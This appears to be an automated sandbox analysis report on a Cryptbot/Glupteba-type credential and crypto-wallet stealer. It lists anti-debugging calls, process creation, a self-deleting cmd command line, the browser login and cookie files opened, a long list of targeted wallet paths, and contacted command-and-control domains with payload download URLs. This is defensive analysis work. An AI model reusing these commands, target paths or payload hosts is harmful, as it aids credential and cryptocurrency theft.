Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_03F5E332 mov eax, dword ptr fs:[00000030h] 16_2_03F5E332
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_03F60925 mov eax, dword ptr fs:[00000030h] 16_2_03F60925
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_03F50D90 mov eax, dword ptr fs:[00000030h] 16_2_03F50D90
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_0040E0E2 mov eax, dword ptr fs:[00000030h] 22_2_0040E0E2
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_004106D5 mov eax, dword ptr fs:[00000030h] 22_2_004106D5
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_05A00D90 mov eax, dword ptr fs:[00000030h] 22_2_05A00D90
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_05A10925 mov eax, dword ptr fs:[00000030h] 22_2_05A10925
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_05A0092B mov eax, dword ptr fs:[00000030h] 22_2_05A0092B
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_05A0E332 mov eax, dword ptr fs:[00000030h] 22_2_05A0E332
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_0040E0E2 mov eax, dword ptr fs:[00000030h] 25_2_0040E0E2
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_004106D5 mov eax, dword ptr fs:[00000030h] 25_2_004106D5
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_059D092B mov eax, dword ptr fs:[00000030h] 25_2_059D092B
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_059D0D90 mov eax, dword ptr fs:[00000030h] 25_2_059D0D90
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_059E0925 mov eax, dword ptr fs:[00000030h] 25_2_059E0925
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_059DE332 mov eax, dword ptr fs:[00000030h] 25_2_059DE332
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_0041178C GetProcessHeap, 16_2_0041178C
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_0040A1A9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 16_2_0040A1A9
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_0040A33C SetUnhandledExceptionFilter, 16_2_0040A33C
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_0040D33E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 16_2_0040D33E
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_0040A638 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 16_2_0040A638
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_03F5A3F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 16_2_03F5A3F9
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_03F5A888 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 16_2_03F5A888
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_03F5A58C SetUnhandledExceptionFilter, 16_2_03F5A58C
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_03F5D58E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 16_2_03F5D58E
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_0040A1A9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 22_2_0040A1A9
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_0040A33C SetUnhandledExceptionFilter, 22_2_0040A33C
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_0040D33E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 22_2_0040D33E
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_0040A638 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 22_2_0040A638
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_05A0A58C SetUnhandledExceptionFilter, 22_2_05A0A58C
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_05A0D58E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 22_2_05A0D58E
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_05A0A888 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 22_2_05A0A888
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_05A0A3F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 22_2_05A0A3F9
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_0040A1A9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 25_2_0040A1A9
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_0040A33C SetUnhandledExceptionFilter, 25_2_0040A33C
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_0040D33E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 25_2_0040D33E
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_0040A638 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 25_2_0040A638
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_059DA58C SetUnhandledExceptionFilter, 25_2_059DA58C
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_059DD58E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 25_2_059DD58E
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_059DA888 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 25_2_059DA888
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_059DA3F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 25_2_059DA3F9

HIPS / PFW / Operating System Protection Evasion:

barindex
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Process created: C:\Users\user\AppData\Local\Temp\Murano.exe 'C:\Users\user\AppData\Local\Temp\Murano.exe' Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c rd /s /q C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk & timeout 3 & del /f /q 'C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe' Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 3 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c C:\Windows\System32\cmd.exe < Scoprirvi.eps Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Code function: 18_2_0040285A AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 18_2_0040285A
Source: vpn.exe, 00000012.00000003.387443345.0000000003C68000.00000004.00000001.sdmp, Notti.eps.18.dr Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: SmartClock.exe, 00000016.00000002.497106175.00000000045D0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: SmartClock.exe, 00000016.00000002.497106175.00000000045D0000.00000002.00000001.sdmp Binary or memory string: Progman
Source: SmartClock.exe, 00000016.00000002.497106175.00000000045D0000.00000002.00000001.sdmp Binary or memory string: SProgram Managerl
Source: SmartClock.exe, 00000016.00000002.497106175.00000000045D0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd,
Source: SmartClock.exe, 00000016.00000002.497106175.00000000045D0000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_0040A45B cpuid 16_2_0040A45B
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Code function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar, 18_2_004025A3
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Queries volume information: C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk\_Files\_AllCookies_list.txt VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Queries volume information: C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk\_Files\_Cookies\google_chrome_new.txt VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Queries volume information: C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk\_Files\_Information.txt VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Queries volume information: C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk\_Files\_Screen_Desktop.jpeg VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Queries volume information: C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk\files_\cookies\google_chrome_new.txt VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Queries volume information: C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk\files_\cookies.txt VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Queries volume information: C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk\files_\screenshot.jpg VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Queries volume information: C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk\files_\system_info.txt VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_004A0BF0 SetFilePointer,SetFilePointer,SetFilePointer,GetLocalTime,SystemTimeToFileTime,FileTimeToSystemTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, 0_2_004A0BF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_00418C20 CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetModuleFileNameW,RegOpenKeyExW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,ExpandEnvironmentStringsW,GetUserDefaultLocaleName,GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,_strftime,_strftime,GetUserNameW,GetComputerNameW,RegOpenKeyExW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,GetSystemInfo,GlobalMemoryStatusEx,RegOpenKeyExW, 0_2_00418C20
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_004B465F _free,_free,_free,GetTimeZoneInformation,_free, 0_2_004B465F
Source: C:\Users\user\AppData\Local\Temp\Murano.exe Code function: 13_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW, 13_2_00406831

Stealing of Sensitive Information:

barindex
Yara detected Cryptbot
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe PID: 5964, type: MEMORY
Yara detected Glupteba
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe PID: 5964, type: MEMORY
Found many strings related to Crypto-Wallets (likely being stolen)
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe String found in binary or memory: \_Files\_Wallet\Electrum
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe String found in binary or memory: \_Files\_Wallet\ElectronCash
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp String found in binary or memory: *.*%USERPROFILE%\Desktop\*.txt%USERPROFILE%wallet.datUTC--2*%LocalAppData%\Coinomi%AppData%\waves-exchange%AppData%\Ledger Live\sqlite\_Files\_Files\Coinomi\_Files\_Files\waves_exchange\_Files\_Files\Ledger_Live_sqlite\_Files\_Wallet\Electrum\_Files\_Wallet\ElectronCash\_Files\_Wallet\Electrum-btcp%USERPROFILE%\AppData\Roaming\Jaxx%USERPROFILE%\AppData\Roaming\Exodus%USERPROFILE%\AppData\Roaming\MultiBitHD%USERPROFILE%\Documents\Monero%USERPROFILE%\AppData\Roaming\Exodus Eden%USERPROFILE%\AppData\Roaming\Electrum\wallets%USERPROFILE%\AppData\Roaming\Electrum-btcp\wallets%USERPROFILE%\AppData\Roaming\ElectronCash\wallets%USERPROFILE%\AppData\Roaming\com.liberty.jaxx%APPDATA%\Atomic%APPDATA%\waves-client\_Files\_Wallet\Jaxx\_Files\_Wallet\Exodus\_Files\_Wallet\MultiBitHD\_Files\_Wallet\Monero\_Files\_Wallet\Exodus Eden\_Files\_Wallet\Electrum\wallets\_Files\_Wallet\Electrum-btcp\wallets\_Files\_Wallet\ElectronCash\wallets\_Files\_Wallet\com.liberty.jaxx\_Files\_Wallet\Atomic\_Files\_Wallet\waves-client\_Files\_Information.txt\files_\system_info.txt%wS [ %wS ]
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe String found in binary or memory: %USERPROFILE%\AppData\Roaming\Jaxx
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp String found in binary or memory: *.*%USERPROFILE%\Desktop\*.txt%USERPROFILE%wallet.datUTC--2*%LocalAppData%\Coinomi%AppData%\waves-exchange%AppData%\Ledger Live\sqlite\_Files\_Files\Coinomi\_Files\_Files\waves_exchange\_Files\_Files\Ledger_Live_sqlite\_Files\_Wallet\Electrum\_Files\_Wallet\ElectronCash\_Files\_Wallet\Electrum-btcp%USERPROFILE%\AppData\Roaming\Jaxx%USERPROFILE%\AppData\Roaming\Exodus%USERPROFILE%\AppData\Roaming\MultiBitHD%USERPROFILE%\Documents\Monero%USERPROFILE%\AppData\Roaming\Exodus Eden%USERPROFILE%\AppData\Roaming\Electrum\wallets%USERPROFILE%\AppData\Roaming\Electrum-btcp\wallets%USERPROFILE%\AppData\Roaming\ElectronCash\wallets%USERPROFILE%\AppData\Roaming\com.liberty.jaxx%APPDATA%\Atomic%APPDATA%\waves-client\_Files\_Wallet\Jaxx\_Files\_Wallet\Exodus\_Files\_Wallet\MultiBitHD\_Files\_Wallet\Monero\_Files\_Wallet\Exodus Eden\_Files\_Wallet\Electrum\wallets\_Files\_Wallet\Electrum-btcp\wallets\_Files\_Wallet\ElectronCash\wallets\_Files\_Wallet\com.liberty.jaxx\_Files\_Wallet\Atomic\_Files\_Wallet\waves-client\_Files\_Information.txt\files_\system_info.txt%wS [ %wS ]
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe String found in binary or memory: %USERPROFILE%\AppData\Roaming\Exodus
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.383574469.0000000005B00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.231267121.0000000005BE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe PID: 5964, type: MEMORY
Source: Yara match File source: 0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.5b00e50.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.5b00e50.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.5be0000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

barindex
Yara detected Cryptbot
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe PID: 5964, type: MEMORY
Yara detected Glupteba
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe PID: 5964, type: MEMORY
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_004098C0 AddClipboardFormatListener,SetEvent, 16_2_004098C0
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_00409436 IsWindow,RemoveClipboardFormatListener,IsWindow, 16_2_00409436
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_004095A8 RemoveClipboardFormatListener, 16_2_004095A8
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_004097BA AddClipboardFormatListener, 16_2_004097BA
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_03F59B10 AddClipboardFormatListener,SetEvent, 16_2_03F59B10
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_03F59A0A AddClipboardFormatListener, 16_2_03F59A0A
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_03F597F8 RemoveClipboardFormatListener, 16_2_03F597F8
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_03F59686 IsWindow,RemoveClipboardFormatListener,IsWindow, 16_2_03F59686
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_004098C0 AddClipboardFormatListener,SetEvent, 22_2_004098C0
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_00409436 IsWindow,RemoveClipboardFormatListener,IsWindow, 22_2_00409436
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_004095A8 RemoveClipboardFormatListener, 22_2_004095A8
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_004097BA AddClipboardFormatListener, 22_2_004097BA
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_05A097F8 RemoveClipboardFormatListener, 22_2_05A097F8
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_05A09686 IsWindow,RemoveClipboardFormatListener,IsWindow, 22_2_05A09686
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_05A09B10 AddClipboardFormatListener,SetEvent, 22_2_05A09B10
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_05A09A0A AddClipboardFormatListener, 22_2_05A09A0A
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_004098C0 AddClipboardFormatListener,SetEvent, 25_2_004098C0
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_00409436 IsWindow,RemoveClipboardFormatListener,IsWindow, 25_2_00409436
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_004095A8 RemoveClipboardFormatListener, 25_2_004095A8
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_004097BA AddClipboardFormatListener, 25_2_004097BA
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_059D97F8 RemoveClipboardFormatListener, 25_2_059D97F8
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_059D9686 IsWindow,RemoveClipboardFormatListener,IsWindow, 25_2_059D9686
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_059D9B10 AddClipboardFormatListener,SetEvent, 25_2_059D9B10
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_059D9A0A AddClipboardFormatListener, 25_2_059D9A0A
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 385467 Sample: SecuriteInfo.com.W32.AIDete... Startdate: 12/04/2021 Architecture: WINDOWS Score: 100 70 EiodCJGkPupHarewIHgoYXhjJQvRZ.EiodCJGkPupHarewIHgoYXhjJQvRZ 2->70 78 Multi AV Scanner detection for domain / URL 2->78 80 Malicious sample detected (through community Yara rule) 2->80 82 Multi AV Scanner detection for dropped file 2->82 84 10 other signatures 2->84 10 SecuriteInfo.com.W32.AIDetect.malware1.24453.exe 50 2->10         started        15 SmartClock.exe 2->15         started        17 SmartClock.exe 2->17         started        signatures3 process4 dnsIp5 72 awumad01.top 8.209.66.205, 49719, 49720, 80 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC Singapore 10->72 74 mardeq01.top 8.209.64.179, 49718, 80 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC Singapore 10->74 76 aufsvg12.top 8.211.1.15, 49717, 80 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC Singapore 10->76 64 C:\Users\user\AppData\Local\Temp\Murano.exe, PE32 10->64 dropped 66 C:\Users\user\AppData\Local\...\lv[1].exe, PE32 10->66 dropped 90 Detected unpacking (changes PE section rights) 10->90 92 Detected unpacking (overwrites its own PE header) 10->92 94 Tries to harvest and steal browser information (history, passwords, etc) 10->94 19 Murano.exe 19 10->19         started        23 cmd.exe 1 10->23         started        file6 signatures7 process8 file9 58 C:\Users\user\AppData\Local\Temp\...\vpn.exe, PE32 19->58 dropped 60 C:\Users\user\AppData\Local\Temp\...\4.exe, PE32 19->60 dropped 62 C:\Users\user\AppData\Local\Temp\...\UAC.dll, PE32 19->62 dropped 86 Multi AV Scanner detection for dropped file 19->86 88 Machine Learning detection for dropped file 19->88 25 vpn.exe 7 19->25         started        27 4.exe 4 19->27         started        30 conhost.exe 23->30         started        32 timeout.exe 1 23->32         started        signatures10 process11 file12 34 makecab.exe 1 25->34         started        36 makecab.exe 1 25->36         started        38 makecab.exe 1 25->38         started        42 5 other processes 25->42 68 C:\Users\user\AppData\...\SmartClock.exe, PE32 27->68 dropped 40 SmartClock.exe 27->40         started        process13 process14 44 conhost.exe 34->44         started        46 conhost.exe 36->46         started        48 conhost.exe 38->48         started        50 conhost.exe 42->50         started        52 conhost.exe 42->52         started        54 conhost.exe 42->54         started        56 2 other processes 42->56
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
8.209.66.205
 awumad01.top Singapore
45102 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC true
8.211.1.15
 aufsvg12.top Singapore
45102 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC false
8.209.64.179
 mardeq01.top Singapore
45102 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC false

Contacted Domains

Name IP Active
mardeq01.top 8.209.64.179 true
awumad01.top 8.209.66.205 true
aufsvg12.top 8.211.1.15 true
EiodCJGkPupHarewIHgoYXhjJQvRZ.EiodCJGkPupHarewIHgoYXhjJQvRZ unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://aufsvg12.top/index.php false
  • Avira URL Cloud: safe
 unknown
http://mardeq01.top/index.php false
  • Avira URL Cloud: safe
 unknown
http://awumad01.top/downfiles/lv.exe true
  • Avira URL Cloud: safe
 unknown
http://awumad01.top/download.php?file=lv.exe true
  • Avira URL Cloud: safe
 unknown